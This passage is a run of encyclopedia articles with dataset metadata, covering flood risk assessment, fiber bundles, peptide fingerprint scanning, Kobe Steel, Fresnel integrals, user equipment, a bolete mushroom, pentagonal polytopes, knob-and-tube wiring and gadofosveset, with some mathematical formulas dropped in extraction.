into account the risk and impact of flooding on the site, and takes into consideration how the development may affect flooding in the local area. It also includes provides recommendations as to how the risk of flooding to the development can be mitigated. FRAs should also consider flooding from all sources including fluvial, groundwater, surface water runoff and sewer flooding. For sites located within areas at risk of flooding a sequential test may be required. The aim of the sequential test is to direct development to locations at the lowest risk of flooding. The National Planning Policy Framework (NPPF) was amended in 2020 to require sequential tests for sites that are at risk of any form of flooding. Northern Ireland In 2006, the Planning Service, part of The Department of the Environment, published Planning Policy Statement 15 (PPS15): Planning and flood risk. The guidelines are precautionary and advise against development in flood plains and areas subject to historical flooding. In exceptional cases a FRA can be completed to justify development in flood risk areas. Advice on flood risk assessment is provided to the Planning Service by the Rivers Agency, which is the statutory drainage and flood defence authority for Northern Ireland. Republic of Ireland In 2009, the Department of the Environment, Heritage and Local Government and Office of Public Works published planning guidelines requiring local authorities to apply a sequential approach to flood risk management. The guidelines require that proposed development in flood risk areas must undergo a justification test, consisting of a flood risk assessment. See also Flood warning Floods directive Flood Modeller Pro, software used to undertake flood risk assessments References Flood control Environmental policy in the United Kingdom Extreme value data
Flood risk assessment
Chemistry,Engineering
1,036
4,067,918
https://en.wikipedia.org/wiki/Vertical%20and%20horizontal%20bundles
In mathematics, the vertical bundle and the horizontal bundle are vector bundles associated to a smooth fiber bundle. More precisely, given a smooth fiber bundle , the vertical bundle and horizontal bundle are subbundles of the tangent bundle of whose Whitney sum satisfies . This means that, over each point , the fibers and form complementary subspaces of the tangent space . The vertical bundle consists of all vectors that are tangent to the fibers, while the horizontal bundle requires some choice of complementary subbundle. To make this precise, define the vertical space at to be . That is, the differential (where ) is a linear surjection whose kernel has the same dimension as the fibers of . If we write , then consists of exactly the vectors in which are also tangent to . The name is motivated by low-dimensional examples like the trivial line bundle over a circle, which is sometimes depicted as a vertical cylinder projecting to a horizontal circle. A subspace of is called a horizontal space if is the direct sum of and . The disjoint union of the vertical spaces VeE for each e in E is the subbundle VE of TE; this is the vertical bundle of E. Likewise, provided the horizontal spaces vary smoothly with e, their disjoint union is a horizontal bundle. The use of the words "the" and "a" here is intentional: each vertical subspace is unique, defined explicitly by . Excluding trivial cases, there are an infinite number of horizontal subspaces at each point. Also note that arbitrary choices of horizontal space at each point will not, in general, form a smooth vector bundle; they must also vary in an appropriately smooth way. The horizontal bundle is one way to formulate the notion of an Ehresmann connection on a fiber bundle. Thus, for example, if E is a principal G-bundle, then the horizontal bundle is usually required to be G-invariant: such a choice is equivalent to a connection on the principal bundle. This notably occurs when E is the frame bundle associated to some vector bundle, which is a principal bundle. Formal definition Let π:E→B be a smooth fiber bundle over a smooth manifold B. The vertical bundle is the kernel VE := ker(dπ) of the tangent map dπ : TE → TB. Since dπe is surjective at each point e, it yields a regular subbundle of TE. Furthermore, the vertical bundle VE is also integrable. An Ehresmann connection on E is a choice of a complementary subbundle HE to VE in TE, called the horizontal bundle of the connection. At each point e in E, the two subspaces form a direct sum, such that TeE = VeE ⊕ HeE. Example The Möbius strip is a line bundle over the circle, and the circle can be pictured as the middle ring of the strip. At each point on the strip, the projection map projects it towards the middle ring, and the fiber is perpendicular to the middle ring. The vertical bundle at this point is the tangent space to the fiber. A simple example of a smooth fiber bundle is a Cartesian product of two manifolds. Consider the bundle B1 := (M × N, pr1) with bundle projection pr1 : M × N → M : (x, y) → x. Applying the definition in the paragraph above to find the vertical bundle, we consider first a point (m,n) in M × N. Then the image of this point under pr1 is m. The preimage of m under this same pr1 is {m} × N, so that T(m,n) ({m} × N) = {m} × TN. The vertical bundle is then VB1 = M × TN, which is a subbundle of T(M ×N). If we take the other projection pr2 : M × N → N : (x, y) → y to define the fiber bundle B2 := (M × N, pr2) then the vertical bundle will be VB2 = TM × N. In both cases, the product structure gives a natural choice of horizontal bundle, and hence an Ehresmann connection: the horizontal bundle of B1 is the vertical bundle of B2 and vice versa. Properties Various important tensors and differential forms from differential geometry take on specific properties on the vertical and horizontal bundles, or even can be defined in terms of them. Some of these are: A vertical vector field is a vector field that is in the vertical bundle. That is, for each point e of E, one chooses a vector where is the vertical vector space at e. A differentiable r-form on E is said to be a horizontal form if whenever at least one of the vectors is vertical. The connection form vanishes on the horizontal bundle, and is non-zero only on the vertical bundle. In this way, the connection form can be used to define the horizontal bundle: The horizontal bundle is the kernel of the connection form. The solder form or tautological one-form vanishes on the vertical bundle and is non-zero only on the horizontal bundle. By definition, the solder form takes its values entirely in the horizontal bundle. For the case of a frame bundle, the torsion form vanishes on the vertical bundle, and can be used to define exactly that part that needs to be added to an arbitrary connection to turn it into a Levi-Civita connection, i.e. to make a connection be torsionless. Indeed, if one writes θ for the solder form, then the torsion tensor Θ is given by Θ = D θ (with D the exterior covariant derivative). For any given connection ω, there is a unique one-form σ on TE, called the contorsion tensor, that is vanishing in the vertical bundle, and is such that ω+σ is another connection 1-form that is torsion-free. The resulting one-form ω+σ is nothing other than the Levi-Civita connection. One can take this as a definition: since the torsion is given by , the vanishing of the torsion is equivalent to having , and it is not hard to show that σ must vanish on the vertical bundle, and that σ must be G-invariant on each fibre (more precisely, that σ transforms in the adjoint representation of G). Note that this defines the Levi-Civita connection without making any explicit reference to any metric tensor (although the metric tensor can be understood to be a special case of a solder form, as it establishes a mapping between the tangent and cotangent bundles of the base space, i.e. between the horizontal and vertical subspaces of the frame bundle). In the case where E is a principal bundle, then the fundamental vector field must necessarily live in the vertical bundle, and vanish in any horizontal bundle. Notes References Differential topology Fiber bundles Connection (mathematics)
Vertical and horizontal bundles
Mathematics
1,424
7,324,297
https://en.wikipedia.org/wiki/Genome-based%20peptide%20fingerprint%20scanning
Genome-based peptide fingerprint scanning (GFS) is a system in bioinformatics analysis that attempts to identify the genomic origin (that is, what species they come from) of sample proteins by scanning their peptide-mass fingerprint against the theoretical translation and proteolytic digest of an entire genome. This method is an improvement from previous methods because it compares the peptide fingerprints to an entire genome instead of comparing it to an already annotated genome. This improvement has the potential to improve genome annotation and identify proteins with incorrect or missing annotations. History and background GFS was designed by Michael C. Giddings (University of North Carolina, Chapel Hill) et al., and released in 2003. Giddings expanded the algorithms for GFS from earlier ideas. Two papers were published in 1993 explaining the techniques used to identify proteins in sequence databases. These methods determined the mass of peptides using mass spectrometry, and then used the mass to search protein databases to identify the proteins In 1999 a more complex program was released called Mascot that integrated three types of protein/database searches: peptide molecular weights, tandem mass spectrometry from one or more peptide, and combination mass data with amino acid sequence. The fallback with this widely used program is that it is unable to detect alternative splice sites that are not currently annotated, and it not usually able to find proteins that have not been annotated. Giddings built upon these sources to create GFS which would compare peptide mass data to entire genomes to identify the proteins. Giddings system is able to find new annotations of genes that have not been found, such as undocumented genes and undocumented alternative splice sites. Research examples In 2012 research was published where genes and proteins were found in a model organism that could not have been found without GFS because they had not been previously annotated. The planarian Schmidtea mediterranea has been used in research for over 100 years. This planarian is capable of regenerating missing body parts and is therefore emerging as potential model organism for stem cell research. Planarians are covered in mucus which aids in locomotion, in protecting them from predation, and in helping their immune system. The genome of Schmidtea mediterranea is sequenced but mostly un-annotated making it a prime candidate for genome-based peptide fingerprint scanning. When the proteins were analyzed with GFS 1,604 proteins were identified. These proteins had mostly not been annotated before they were found with GFS They were also able to find the mucous subproteome (all the genes associated with mucus production). They found that this proteome was conserved in the sister species Schmidtea mansoni. The mucous subproteome is so conserved that 119 orthologs of planarians are found in humans. Due to the similarity in these genes the planarian can now be used as a model to study mucous protein function in humans. This is relevant for infections and diseases related to mucous aberrancies such as cystic fibrosis, asthma, and other lung diseases. These genes could not have been found without GFS because they had not been previously annotated. In February 2013, proteogenomic mapping research was done with ENCODE to identify translational regions in the human genome. They applied peptide fingerprint scanning and MASCOT to the protein data to find regions that may not have been previously annotated as translated in the human genome. This search against the whole genome revealed that approximately 4% of unique peptide that they found were outside of previously annotated regions. Also the comparison of the whole genome revealed 15% more hits than from a protein database search (such as MASCOT) alone. GFS can be used as a complementary method for annotation due to the fact that you can find new genes or splice sites that have not been annotated before. However it is important to remember that the whole genome approach used by GFS can be less sensitive than programs that look only at annotated regions. References External links Genome-based Peptide Fingerprint Scanning (GFS) Documentation Facebook link to "Genome-based Peptide Fingerprint Scanning" Explanation of MS/MS in relation to MASCOT Bioinformatics Genomics techniques
Genome-based peptide fingerprint scanning
Chemistry,Engineering,Biology
887
2,650,443
https://en.wikipedia.org/wiki/Kobe%20Steel
Kobe Steel, Ltd. (株式会社神戸製鋼所, Kabushiki gaisha Kōbe Seikō-sho), is a major Japanese steel manufacturer headquartered in Chūō-ku, Kobe. KOBELCO is the unified brand name of the Kobe Steel Group. Kobe Steel has the lowest proportion of steel operations of any major steelmaker in Japan and is characterised as a conglomerate comprising the three pillars of the Materials Division, the Machinery Division and the Power Division. The materials division has a high market share in wire rods and aluminium materials for transport equipment, while the machinery division has a high market share in screw compressors. In addition, the power sector has one of the largest wholesale power supply operations in the country. Kobe Steel is a member of the Mizuho keiretsu. It was formerly part of the DKB Group, Sanwa Group keiretsu, which later were subsumed into Mizuho. The company is listed on the Tokyo & Nagoya Stock Exchange, where its stock is a component of the Nikkei 225. As of March 31, 2022, Kobe Steel has 201 subsidiaries and 50 affiliated companies across Japan, Asia, Europe, the Middle East and the US. Its main production facilities are Kakogawa Steel Works and Takasago Works. Kobe Steel is also famous as the owner of the rugby team Kobelco Steelers. History In 1905, the general partnership trading company Suzuki Shoten acquired a steel business in Wakinohama, Kobe, called Kobayashi Seikosho, operated by Seiichiro Kobayashi, and changed its name to Kobe Seikosho. Then, in 1911, Suzuki Shoten spun off the company to establish Kobe Steel Works, Ltd. at Wakinohamacho, Kobe. After the Russo-Japanese War, as the Imperial Japanese Navy adopted a policy of fostering private factories, Kobe Steel received technical guidance and orders from the Kure Naval Arsenal and other arsenals in Maizuru and Yokosuka, and expanded its scale. Around 1914, the company started making machinery for naval vessels and began its journey as a machine manufacturer. Its business performance expanded, partly due to the shipbuilding boom during World War I. In 1918, it acquired the rights to manufacture diesel engines from Sulzer of Switzerland, helping to speed up the Japanese naval, marine, locomotive and automobile transport sectors. Today, the KOBELCO Group operates a broad range of business fields that cover Steel & Aluminum, Advanced Materials, Welding, Machinery, Engineering, Construction Machinery, and Electric Power. In the Great Hanshin Earthquake of January 1995, the Kobe head office building and company housing collapsed, and the No. 3 Blast Furnace at the Kobe Steel Works was also damaged, resulting in an emergency shutdown, causing approximately JPY 100 billion in damage, the largest for a private company. The Third Blast Furnace, which restarted only two and a half months after the earthquake, had become a 'symbol of recovery', but was suspended in October 2017 in order to strengthen competitiveness. In recent years, the company has been focusing on fields other than steel, such as aluminium, machinery, and electric power, and is clearly aiming to change from being a 'steelmaker' to a 'manufacturer that also handles steel'. Former prime minister Shinzō Abe worked at Kobe Steel before entering politics. Main locations Source: Domestic Locations Kobe Head Office Tokyo Head Office Takasago Works Kobe Corporate Research Laboratories Kakogawa Works Research & Development Laboratory Kobe Wire Rod & Bar Plant Fujisawa Office Ibaraki Plant Saijo Plant Fukuchiyama Plant Moka Works Chofu Works Daian Works Overseas Regional Headquarters and Offices Kobe Steel USA Inc. (U.S. headquarters): 19575 Victor Parkway, Suite 200 Livonia, MI, 48152, USA Kobelco (China) Holding Co., Ltd. (China headquarters, investment company): Room 3701, Hong Kong New World Tower, No.300 Middle Huai Hai Zhong Road, Huangpu District, Shanghai, 200021, People's Republic of China Kobelco (China) Holding Co., Ltd. (Guangzhou Branch): Room 1203, #285 East Linhe Road, Tianhe District, Guangzhou City, Guangdong Province, People's Republic of China Kobelco South East Asia Ltd. (Regional headquarters for Southeast Asia and South Asia): 17th Floor, Sathorn Thani Tower ll, 92/49 North Sathorn Road, Khwaeng Silom, Khet Bangrak, Bangkok, 10500, Kingdom of Thailand Kobelco Europe GmbH (Regional Headquarters for Europe and the Middle East): Luitpoldstrasse 3, 80335 Munich, Germany Business Units & Main Products Source: Steel & Aluminum Steel Sheets Wire Rods and Bars Aluminum Plate Steel Plates Welding Robots and Electric Power Sources Welding Materials Advanced Materials Steel Castings and Forgings Titanium Copper Sheet and Strip Steel Powder Machinery Standard Compressors Rotating Machinery Tire and Rubber Machinery Plastic Processing Machinery Advanced Technology Equipment Rolling Mill・Press Machine Ultra High Pressure Equipment Energy & Chemical Field Engineering Iron Unit Field Advanced Urban Transit System Electric Power Wholesale Power Supply Scandal In October 2017, Kobe Steel admitted to falsifying data on the strength and durability of its aluminium, copper and steel products. The scandal deepened when the company said it found falsified data on its iron ore powder, which caused its shares to fall 18%. By 11 October, shares had fallen by a third. After testing the parts of their bullet trains, the Central Japan Railway Company announced that 310 components were discovered to contain sub-standard parts supplied by Kobe Steel. Following further news in October 2017 that car makers Toyota, Nissan, and General Motors, and train manufacturer Hitachi, were among 200 companies affected by the Kobe Steel's mislabelling, which had potential safety implications for their vehicles, the CEO of Kobe Steel conceded that his company now had "zero credibility". Other affected companies include Ford, Boeing and Mitsubishi Heavy Industries. CEO Kawasaki promised to lead an internal investigation. On 13 October 2017, Kobe Steel admitted that the number of companies misled was over 500. Despite the costs of dealing with the scandal, Kobe Steel issued a revised profit forecast in February 2018 announcing that it expects to generate a net profit of ¥45 billion ($421 million) for the full 2017 fiscal year, marking its first net profit in three years. Gallery See also Kobeseiko Te-Gō References External links Official global website Kobe Steel Group of Companies History of Kobe Steel Group Kobelco Construction Machinery Europe Steel companies of Japan Crane manufacturers Construction equipment manufacturers of Japan Companies listed on the Tokyo Stock Exchange Companies listed on the Nagoya Stock Exchange Companies listed on the Osaka Exchange Companies in the Nikkei 225 Manufacturing companies based in Kobe Manufacturing companies established in 1905 Japanese companies established in 1905 Defense companies of Japan Japanese brands Midori-kai Industrial machine manufacturers
Kobe Steel
Engineering
1,382
271,143
https://en.wikipedia.org/wiki/Fresnel%20integral
The Fresnel integrals and are two transcendental functions named after Augustin-Jean Fresnel that are used in optics and are closely related to the error function (). They arise in the description of near-field Fresnel diffraction phenomena and are defined through the following integral representations: The parametric curve is the Euler spiral or clothoid, a curve whose curvature varies linearly with arclength. The term Fresnel integral may also refer to the complex definite integral where is real and positive; this can be evaluated by closing a contour in the complex plane and applying Cauchy's integral theorem. Definition The Fresnel integrals admit the following power series expansions that converge for all : Some widely used tables use instead of for the argument of the integrals defining and . This changes their limits at infinity from to and the arc length for the first spiral turn from to 2 (at ). These alternative functions are usually known as normalized Fresnel integrals. Euler spiral The Euler spiral, also known as a Cornu spiral or clothoid, is the curve generated by a parametric plot of against . The Euler spiral was first studied in the mid 18th century by Leonhard Euler in the context of Euler–Bernoulli beam theory. A century later, Marie Alfred Cornu constructed the same spiral as a nomogram for diffraction computations. From the definitions of Fresnel integrals, the infinitesimals and are thus: Thus the length of the spiral measured from the origin can be expressed as That is, the parameter is the curve length measured from the origin , and the Euler spiral has infinite length. The vector also expresses the unit tangent vector along the spiral, giving . Since is the curve length, the curvature can be expressed as Thus the rate of change of curvature with respect to the curve length is An Euler spiral has the property that its curvature at any point is proportional to the distance along the spiral, measured from the origin. This property makes it useful as a transition curve in highway and railway engineering: if a vehicle follows the spiral at unit speed, the parameter in the above derivatives also represents the time. Consequently, a vehicle following the spiral at constant speed will have a constant rate of angular acceleration. Sections from Euler spirals are commonly incorporated into the shape of rollercoaster loops to make what are known as clothoid loops. Properties and are odd functions of , which can be readily seen from the fact that their power series expansions have only odd-degree terms, or alternatively because they are antiderivatives of even functions that also are zero at the origin. Asymptotics of the Fresnel integrals as are given by the formulas: Using the power series expansions above, the Fresnel integrals can be extended to the domain of complex numbers, where they become entire functions of the complex variable . The Fresnel integrals can be expressed using the error function as follows: or Limits as approaches infinity The integrals defining and cannot be evaluated in the closed form in terms of elementary functions, except in special cases. The limits of these functions as goes to infinity are known: This can be derived with any one of several methods. One of them uses a contour integral of the function around the boundary of the sector-shaped region in the complex plane formed by the positive -axis, the bisector of the first quadrant with , and a circular arc of radius centered at the origin. As goes to infinity, the integral along the circular arc tends to where polar coordinates were used and Jordan's inequality was utilised for the second inequality. The integral along the real axis tends to the half Gaussian integral Note too that because the integrand is an entire function on the complex plane, its integral along the whole contour is zero. Overall, we must have where denotes the bisector of the first quadrant, as in the diagram. To evaluate the left hand side, parametrize the bisector as where ranges from 0 to . Note that the square of this expression is just . Therefore, substitution gives the left hand side as Using Euler's formula to take real and imaginary parts of gives this as where we have written to emphasize that the original Gaussian integral's value is completely real with zero imaginary part. Letting and then equating real and imaginary parts produces the following system of two equations in the two unknowns and : Solving this for and gives the desired result. Generalization The integral is a confluent hypergeometric function and also an incomplete gamma function which reduces to Fresnel integrals if real or imaginary parts are taken: The leading term in the asymptotic expansion is and therefore For , the imaginary part of this equation in particular is with the left-hand side converging for and the right-hand side being its analytical extension to the whole plane less where lie the poles of . The Kummer transformation of the confluent hypergeometric function is with Numerical approximation For computation to arbitrary precision, the power series is suitable for small argument. For large argument, asymptotic expansions converge faster. Continued fraction methods may also be used. For computation to particular target precision, other approximations have been developed. Cody developed a set of efficient approximations based on rational functions that give relative errors down to . A FORTRAN implementation of the Cody approximation that includes the values of the coefficients needed for implementation in other languages was published by van Snyder. Boersma developed an approximation with error less than . Applications The Fresnel integrals were originally used in the calculation of the electromagnetic field intensity in an environment where light bends around opaque objects. More recently, they have been used in the design of highways and railways, specifically their curvature transition zones, see track transition curve. Other applications are rollercoasters or calculating the transitions on a velodrome track to allow rapid entry to the bends and gradual exit. Gallery See also Böhmer integral Fresnel zone Track transition curve Euler spiral Zone plate Dirichlet integral Notes References (Uses instead of .) External links Cephes, free/open-source C++/C code to compute Fresnel integrals among other special functions. Used in SciPy and ALGLIB. Faddeeva Package, free/open-source C++/C code to compute complex error functions (from which the Fresnel integrals can be obtained), with wrappers for Matlab, Python, and other languages. Integral calculus Spirals Physical optics Special functions Special hypergeometric functions Analytic functions Diffraction
Fresnel integral
Physics,Chemistry,Materials_science,Mathematics
1,359
427,292
https://en.wikipedia.org/wiki/User%20equipment
In the Universal Mobile Telecommunications System (UMTS) and 3GPP Long Term Evolution (LTE), user equipment (UE) is any device used directly by an end-user to communicate. It can be a hand-held telephone, a laptop computer equipped with a mobile broadband adapter, or any other device. It connects to the base station Node B/eNodeB as specified in the ETSI 125/136-series and 3GPP 25/36-series of specifications. It roughly corresponds to the mobile station (MS) in GSM systems. The radio interface between the UE and the Node B is called Uu. In the context of UMTS (Universal Mobile Telecommunications System), Uu stands for the interface between UTRAN (UMTS Terrestrial Radio Access Network) and the UE (User Equipment). Functionality UE handles the following tasks towards the core network: Mobility management Call control Session management Identity management The corresponding protocols are transmitted transparently via a Node B, that is, Node B does not change, use or understand the information. These protocols are also referred to as Non Access Stratum protocols. The UE is a device which initiates all the calls and it is the terminal device in a network. References External links 3GPP 25-series of specifications 3GPP 36-series of specifications UMTS Mobile telecommunications standards 3GPP standards
User equipment
Technology
284
74,384,507
https://en.wikipedia.org/wiki/Lanmaoa%20asiatica
Lanmaoa asiatica is a species of bolete mushroom in the family Boletaceae that is native to southwest China and adjacent regions. It is reddish in color and it is an ectomycorrhizal symbiote of the Yunnan Pine, Pinus yunnanensis. It is considered a choice wild edible in Yunnan Province and may have hallucinogenic compounds which may or may not be removable by cooking. It is unclear what compounds exist in the fungi that could cause such hallucinations, but if they exist, they are likely to be different from those in psilocybin mushrooms. US Treasury Secretary Janet Yellen ate a dish with L. asiatica when visiting China in July 2023. References Boletaceae Fungi described in 2015 Fungi of China Fungus species
Lanmaoa asiatica
Biology
161
33,020,517
https://en.wikipedia.org/wiki/Pentagonal%20polytope
In geometry, a pentagonal polytope is a regular polytope in n dimensions constructed from the Hn Coxeter group. The family was named by H. S. M. Coxeter, because the two-dimensional pentagonal polytope is a pentagon. It can be named by its Schläfli symbol as {5, 3n − 2} (dodecahedral) or {3n − 2, 5} (icosahedral). Family members The family starts as 1-polytopes and ends with n = 5 as infinite tessellations of 4-dimensional hyperbolic space. There are two types of pentagonal polytopes; they may be termed the dodecahedral and icosahedral types, by their three-dimensional members. The two types are duals of each other. Dodecahedral The complete family of dodecahedral pentagonal polytopes are: Line segment, { } Pentagon, {5} Dodecahedron, {5, 3} (12 pentagonal faces) 120-cell, {5, 3, 3} (120 dodecahedral cells) Order-3 120-cell honeycomb, {5, 3, 3, 3} (tessellates hyperbolic 4-space (∞ 120-cell facets) The facets of each dodecahedral pentagonal polytope are the dodecahedral pentagonal polytopes of one less dimension. Their vertex figures are the simplices of one less dimension. Icosahedral The complete family of icosahedral pentagonal polytopes are: Line segment, { } Pentagon, {5} Icosahedron, {3, 5} (20 triangular faces) 600-cell, {3, 3, 5} (600 tetrahedron cells) Order-5 5-cell honeycomb, {3, 3, 3, 5} (tessellates hyperbolic 4-space (∞ 5-cell facets) The facets of each icosahedral pentagonal polytope are the simplices of one less dimension. Their vertex figures are icosahedral pentagonal polytopes of one less dimension. Related star polytopes and honeycombs The pentagonal polytopes can be stellated to form new star regular polytopes: In two dimensions, we obtain the pentagram {5/2}, In three dimensions, this forms the four Kepler–Poinsot polyhedra, {3,5/2}, {5/2,3}, {5,5/2}, and {5/2,5}. In four dimensions, this forms the ten Schläfli–Hess polychora: {3,5,5/2}, {5/2,5,3}, {5,5/2,5}, {5,3,5/2}, {5/2,3,5}, {5/2,5,5/2}, {5,5/2,3}, {3,5/2,5}, {3,3,5/2}, and {5/2,3,3}. In four-dimensional hyperbolic space there are four regular star-honeycombs: {5/2,5,3,3}, {3,3,5,5/2}, {3,5,5/2,5}, and {5,5/2,5,3}. In some cases, the star pentagonal polytopes are themselves counted among the pentagonal polytopes. Like other polytopes, regular stars can be combined with their duals to form compounds; In two dimensions, a decagrammic star figure {10/2} is formed, In three dimensions, we obtain the compound of dodecahedron and icosahedron, In four dimensions, we obtain the compound of 120-cell and 600-cell. Star polytopes can also be combined. Notes References Kaleidoscopes: Selected Writings of H.S.M. Coxeter, edited by F. Arthur Sherk, Peter McMullen, Anthony C. Thompson, Asia Ivic Weiss, Wiley-Interscience Publication, 1995, (Paper 10) H.S.M. Coxeter, Star Polytopes and the Schlafli Function f(α,β,γ) [Elemente der Mathematik 44 (2) (1989) 25–36] Coxeter, Regular Polytopes, 3rd. ed., Dover Publications, 1973. . (Table I(ii): 16 regular polytopes {p, q, r} in four dimensions, pp. 292–293) Regular polytopes Multi-dimensional geometry
Pentagonal polytope
Physics
981
5,444,091
https://en.wikipedia.org/wiki/Knob-and-tube%20wiring
Knob-and-tube wiring (sometimes abbreviated K&T) is an early standardized method of electrical wiring in buildings, in common use in North America from about 1880 to the 1930s. It consisted of single-insulated copper conductors run within wall or ceiling cavities, passing through joist and stud drill-holes via protective porcelain insulating tubes, and supported along their length on nailed-down porcelain knob insulators. Where conductors entered a wiring device such as a lamp or switch, or were pulled into a wall, they were protected by flexible cloth insulating sleeving called loom. The first insulation was asphalt-saturated cotton cloth, then rubber became common. Wire splices in such installations were twisted together for good mechanical strength, then soldered and wrapped with rubber insulating tape and friction tape (asphalt saturated cloth), or made inside metal junction boxes. Knob and tube wiring was eventually displaced from interior wiring systems because of the high cost of installation compared with use of power cables, which combined both power conductors of a circuit in one run (and which later included grounding conductors). At present, new concealed knob and tube installations are permitted in the U.S. by special permission. Elements Ceramic knobs were cylindrical and generally nailed directly into the wall studs or floor joists. Most had a circular groove running around their circumference, although some were constructed in two pieces with pass-through grooves on each side of the nail in the middle. A leather washer often cushioned the ceramic, to reduce breakage during installation. By wrapping electrical wires around the knob, and securing them with tie wires, the knob could be used to securely and permanently anchor the wire. The knobs separated the wire from potentially combustible framework, facilitated changes in direction, and ensured that wires were not subject to excessive tension. Because the wires were suspended in air, they could dissipate heat well. Ceramic tubes were inserted into holes bored in wall studs or floor joists, and the wires were directed through them. This kept the wires from coming into contact with the wood framing members and from being compressed by the wood as the house settled. Ceramic tubes were sometimes also used when wires crossed over each other, for protection in case the upper wire were to break and fall on the lower conductor. Ceramic cleats, which were block-shaped pieces, served a purpose similar to that of the knobs except that cleats were generally used in places where the wiring was surface mounted. Not all knob and tube installations utilized cleats. Ceramic bushings protected each wire entering a metal device box, when such an enclosure was used. Loom, a woven flexible insulating sleeve, was slipped over insulated wire to provide additional protection whenever a wire passed over or under another wire, when a wire entered a metal device enclosure, and in other situations prescribed by code. Other ceramic pieces would typically be used as a junction point between the wiring system proper, and the more flexible cloth-clad wiring found in light fixtures or other permanent, hard-wired devices. When a generic power outlet was desired, the wiring could run directly into the junction box through a tube of protective loom and a ceramic bushing. Wiring devices such as light switches, receptacle outlets, and lamp sockets were either surface-mounted, suspended, or flush-mounted within walls and ceilings. Only in the last case were metal boxes always used to enclose the wiring and device. Unusual wiring layouts In many older K&T installations, the supply and return wires were routed separately from each other, rather than being located parallel to and near each other. This direct routing method has the advantage of reduced cost by allowing use of the shortest possible lengths of wire, but the major disadvantage is that a detailed building wiring diagram is needed for other electricians to understand multiple interwoven circuits, especially if the wiring is not fully visible throughout its length. By contrast, modern electrical codes now require that all residential wiring connections be made only inside protective enclosures, such as junction boxes, and that all connections must remain accessible for inspection, troubleshooting, repair, or modification. Under the US electrical code, Carter system wiring layouts have now been banned, even for permissible new installations of K&T wiring. However, electricians must be aware of this older system, which is still present in many existing older electrical installations. Neutral fusing Another practice that was common (or even originally required) in some older K&T designs was the installation of separate fuses in both the hot wire and the neutral (return) wire of an electrical circuit. The failure of a neutral fuse would cut off power flow through the affected circuit, but the hot conductor could still remain hot relative to ground, an unexpected and potentially hazardous situation. Because of the presence of a neutral fuse, and in the event that it blew, the neutral conductor could not be relied on to remain near ground potential; and, in fact, could be at full line potential (via transmission of voltage through a switched-on light bulb, for example). Modern electrical codes generally do not require a neutral fuse. Instead, they explicitly forbid configurations that might break continuity of the neutral conductor, unless all associated hot conductors are also simultaneously disconnected (for example, by using ganged or "tied" circuit breakers). In retrofit situations electricians may place a higher value fuse on the neutral, so that fuse blows last. Advantages In the early 1900s, K&T wiring was less expensive to install than other wiring methods. For several decades, electricians could choose between K&T wiring, conduit, armored cable, and metal junction boxes. The conduit methods were known to be of better quality, but cost significantly more than K&T. In 1909, flexible armored cable cost about twice as much as K&T, and conduit cost about three times the price of K&T. Knob and tube wiring persisted since it allowed owners to wire a building for electricity at lower cost. Modern wiring methods assume that two or more load-carrying conductors will lie very near each other, as for instance in standard NM-2 cable. When installed correctly, the K&T wires are held away from the structural materials by ceramic insulators. Over the K&T era multiple wire types evolved. Early wiring was insulated with cotton cloth and soft rubber, while later wiring was much more robust. Although the actual wire covering may have degraded over the decades, the porcelain standoffs have a nearly unlimited lifespan and will keep any bare wires safely insulated. Today, porcelain standoffs are still commonly used with bare-wire electric fencing for livestock, and such porcelain standoffs carry far higher voltage surges without risk of shorting to ground. In summary, K&T wiring that was installed correctly, and not damaged or incorrectly modified since then, is fairly safe when used within the original current-carrying limits, typically about ten amperes per circuit. Disadvantages Historically, wiring installation requirements were less demanding in the age of knob-and-tube wiring than today. Compared to modern electrical wiring standards, these are the main technical shortcomings of knob-and-tube wiring methods: never included a safety grounding conductor did not confine switching to the hot conductor (the so-called Carter system prohibited as of 1923 places electrical loads across the common terminals of a three-way switch pair) permitted the use of in-line splices in walls without a junction box (however, this downside is offset by the strong nature of the soldered and taped junctions used at the time). susceptible to mechanical damage in accessible areas Over time, the price of electrician labor grew faster than the cost of materials. This removed the price advantage of K&T methods, especially since they required time-consuming skillful soldering of in-line splices and junctions, and careful hand-wrapping of connections in layers of insulating tape. Knob-and-tube wiring can be made with high current carrying capacity. However, most existing residential knob-and-tube installations, dating to before 1940, have fewer branch circuits than is desired today. While these installations were adequate for the electrical loads at the time of installation, modern households use a range and intensity of electrical equipment unforeseen at the time. Household power use increased dramatically following World War II, due to the wide availability of new electrical appliances and devices. Modern home buyers often find that existing K&T systems lack the capacity for today's levels of power use. First-generation wiring systems became susceptible to abuse by homeowners who would replace blown fuses with fuses rated for higher current. This overfusing of the circuits subjects wiring to higher levels of current and risks heat damage or fire. Knob-and-tube wiring may also be damaged by building renovations. Its cloth and rubber insulation can dry out and turn brittle. It may also be damaged by rodents and careless activities such as hanging objects from wiring running in accessible areas like basements or attics. Currently, the United States National Electrical Code forbids the use of loose, blown-in, or expanding foam insulation over K&T wiring. This is because K&T is designed to let heat dissipate to the surrounding air. As a result, energy efficiency upgrades that involve insulating previously uninsulated walls usually also require replacement of the wiring in affected homes. However, California, Washington, Nebraska, and Oregon have modified the NEC to conditionally allow insulation around K&T. They did not find a single fire that was attributed to K&T, and permit insulation provided the home first passes inspection by an electrician. As existing K&T wiring gets older, insurance companies may deny coverage due to a perception of increased risk. Several companies will not write new homeowners policies at all unless all K&T wiring is replaced, or an electrician certifies that the wiring is in good condition. Also, many institutional lenders are unwilling to finance a home with the relatively low-capacity service typical of K&T wiring, unless the electrical service is upgraded. Partial upgrades, where low demand lighting circuits are left intact, may be acceptable to some insurers. See also Rat-tail splice T-splice Western Union splice References Further reading Written for home owners and do-it-yourselfers. Written for professional electricians and advanced property owners. External links Electrical wiring
Knob-and-tube wiring
Physics,Engineering
2,118
33,014,565
https://en.wikipedia.org/wiki/Gadofosveset
Gadofosveset (trade names Vasovist, Ablavar) is a gadolinium-based MRI contrast agent. It was used as the trisodium salt monohydrate form. It acts as a blood pool agent by binding to human serum albumin. The manufacturer (Lantheus Medical) discontinued production in 2017 due to poor sales. Gadofosveset consists of a gadolinium cation bound to the chelating agent fosveset. It facilitates high-resolution magnetic resonance angiography. Ferumoxytol (trade names Feraheme, Rienso), an intravenous iron-replacement therapy, has been shown to potentially be superior to gadofosveset as a blood pool agent for MR venography in pediatric patients. References MRI contrast agents Organogadolinium compounds Withdrawn drugs
Gadofosveset
Chemistry
180
2,720,244
https://en.wikipedia.org/wiki/Computational%20epidemiology
